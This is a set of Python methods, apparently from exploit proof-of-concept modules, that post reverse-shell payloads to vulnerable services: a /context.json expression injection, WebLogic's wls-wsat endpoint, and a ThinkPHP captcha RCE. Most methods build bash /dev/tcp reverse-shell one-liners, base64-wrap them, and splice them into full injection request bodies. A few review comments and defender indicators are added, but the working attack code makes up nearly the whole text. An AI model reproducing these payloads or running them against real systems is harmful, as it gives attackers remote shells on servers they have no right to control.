    def _shell(self):
        """Shell mode: POST the reverse-shell payload to ``<url>/context.json``.

        The listener IP and port are read from the framework configuration
        (``get_listener_ip`` / ``get_listener_port``), wrapped into a
        base64-encoded bash one-liner and spliced into the JSON request body,
        which is sent exactly once. The HTTP response (``r2``) is never
        inspected and ``result`` is never written to, so ``parse_attack``
        always receives an empty dict. A failed request is logged at warning
        level and otherwise ignored.
        """
        result = {}
        # Build and send the reverse-shell request.
        pocurl = self.url + '/context.json'
        pocheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
            'Content-Type': 'application/json;charset=UTF-8',
            # NOTE(review): hard-coded length is unlikely to match the real body;
            # requests presumably recomputes Content-Length from ``data`` -- confirm.
            'Content-Length': '1003',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9'
        }
        IP = get_listener_ip()
        PORT = get_listener_port()
        # IP = yourlistenerip
        # PORT = yourlistenerport
        payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
        # base64-wrap the command, presumably to avoid quoting problems inside the JSON body
        payload = 'bash -c {echo,' + (base64.b64encode(
            payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
        # Request body with ``payload`` spliced into the ``propertyName`` expression.
        # Defender note: a /context.json body whose propertyName references
        # java.lang.Runtime is a clear indicator of this technique.
        pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} '
        try:
            # no timeout is set, so an unresponsive host blocks this call indefinitely
            r2 = requests.post(url=pocurl,
                               headers=pocheaders,
                               data=pocjson,
                               verify=False)  # TLS certificate verification disabled; response unused
        except Exception as e:
            logger.warn(str(e))  # broad catch; ``warn`` is a deprecated alias of ``warning``

        return self.parse_attack(result)
    def _shell(self):
        """Shell mode: POST the reverse-shell payload to ``<url>/context.json``.

        Same flow as the personalization variant: the listener IP and port
        come from the framework configuration, the bash one-liner is
        base64-wrapped and spliced into the JSON body, and the request is
        sent once. The HTTP response (``r2``) is never inspected and
        ``result`` is never written to, so ``parse_attack`` always receives
        an empty dict. A failed request is logged at warning level and
        otherwise ignored.
        """
        result = {}
        # Build and send the reverse-shell request.
        pocurl = self.url + '/context.json'
        pocheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
            'Content-Type': 'application/json;charset=UTF-8',
            # NOTE(review): hard-coded length is unlikely to match the real body;
            # requests presumably recomputes Content-Length from ``data`` -- confirm.
            'Content-Length': '1003',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9'
        }
        IP = get_listener_ip()
        PORT = get_listener_port()
        # IP = yourlistenerip
        # PORT = yourlistenerport
        payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
        # base64-wrap the command, presumably to avoid quoting problems inside the JSON body
        payload = 'bash -c {echo,' + (base64.b64encode(
            payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
        # Request body with ``payload`` spliced into a ``script::`` parameter value.
        # Defender note: a /context.json body carrying ``script::`` and
        # ``Runtime.getRuntime()`` is a clear indicator of this technique.
        pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
        try:
            # no timeout is set, so an unresponsive host blocks this call indefinitely
            r2 = requests.post(url=pocurl,
                               headers=pocheaders,
                               data=pocjson,
                               verify=False)  # TLS certificate verification disabled; response unused
        except Exception as e:
            logger.warn(str(e))  # broad catch; ``warn`` is a deprecated alias of ``warning``

        return self.parse_attack(result)
 def _shell(self):
     """Shell-mode entry point (stub).

     In shell mode only a single PoC script runs and the console switches to
     an interactive session that executes commands and shows their output.
     This implementation merely formats the bash reverse-shell template with
     the configured listener IP and port; ``cmd`` is built but never sent, so
     calling the method has no observable effect.
     """
     listener = (get_listener_ip(), get_listener_port())
     cmd = REVERSE_PAYLOAD.BASH.format(*listener)  # built but unused: attack code not implemented
 def _options(self):
     """Describe the user-selectable options for this PoC.

     Returns an OrderedDict with a single ``command`` entry: an ``OptDict``
     whose choices are the reverse-payload templates (``nc`` as-is, ``bash``
     already formatted with the configured listener IP and port), with
     ``bash`` pre-selected.
     """
     choices = {
         "nc": REVERSE_PAYLOAD.NC,
         "bash": REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port()),
     }
     options = OrderedDict()
     options["command"] = OptDict(selected="bash", default=choices)
     return options
 def _shell(self):
     """Shell mode: hand a bash reverse-shell command to the module-level ``start`` helper.

     The command is the ``REVERSE_PAYLOAD.BASH`` template formatted with the
     configured listener IP and port. The username/password values appear to
     be redacted placeholders in this listing. Any exception raised by
     ``start`` is logged at error level and swallowed; returns None.
     """
     creds = ('******', '******')
     reverse_cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(),
                                               get_listener_port())
     try:
         start(self.url, reverse_cmd, *creds, shell=True)
     except Exception as err:
         logger.error(str(err))
    def _shell(self):
        """Shell mode: POST a reverse-shell payload to ``/wls-wsat/CoordinatorPortType``.

        The bash one-liner is written with XML entity escapes (``&gt;``,
        ``&amp;``), presumably because ``get_shell_payload`` embeds it in the
        text/xml body sent below -- confirm against that helper. The HTTP
        response is discarded; a request failure is logged at warning level
        and otherwise ignored. Returns None.
        """
        vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
        # listener IP and port come from the framework configuration
        cmd = 'bash -i &gt;&amp; /dev/tcp/{0}/{1} 0&gt;&amp;1'.format(
            get_listener_ip(), get_listener_port())
        shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd)
        headers = {
            "Content-Type": "text/xml;charset=UTF-8",
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
        }

        try:
            # no timeout is set, so an unresponsive host blocks this call indefinitely
            requests.post(vul_url, data=shell_payload, headers=headers)
        except Exception as e:
            logger.warn(str(e))  # broad catch; ``warn`` is a deprecated alias of ``warning``
 def _shell(self):
     """Shell mode: POST each generated shellcode fragment to ``index.php?s=captcha``.

     ``generate_shellcode_list`` builds the fragments for an ``OS.LINUX`` /
     ``OS_ARCH.X86`` target from the configured listener IP and port; each
     fragment is sent as the ``server[REQUEST_METHOD]`` form field. Responses
     are discarded, no timeout is set, and there is no exception handling, so
     any connection error propagates to the caller. Returns None.
     """
     vulurl = self.url + "/index.php?s=captcha"
     # Generate the shellcode fragments that are written to a file on the target.
     _list = generate_shellcode_list(listener_ip=get_listener_ip(),
                                     listener_port=get_listener_port(),
                                     os_target=OS.LINUX,
                                     os_target_arch=OS_ARCH.X86)
     for i in _list:
         data = {
             '_method': '__construct',
             'filter[]': 'system',
             'method': 'get',
             'server[REQUEST_METHOD]': i
         }
         # headers are rebuilt on every iteration; they could be hoisted out of the loop
         headers = {"Content-Type": "application/x-www-form-urlencoded"}
         requests.post(vulurl, data=data, headers=headers)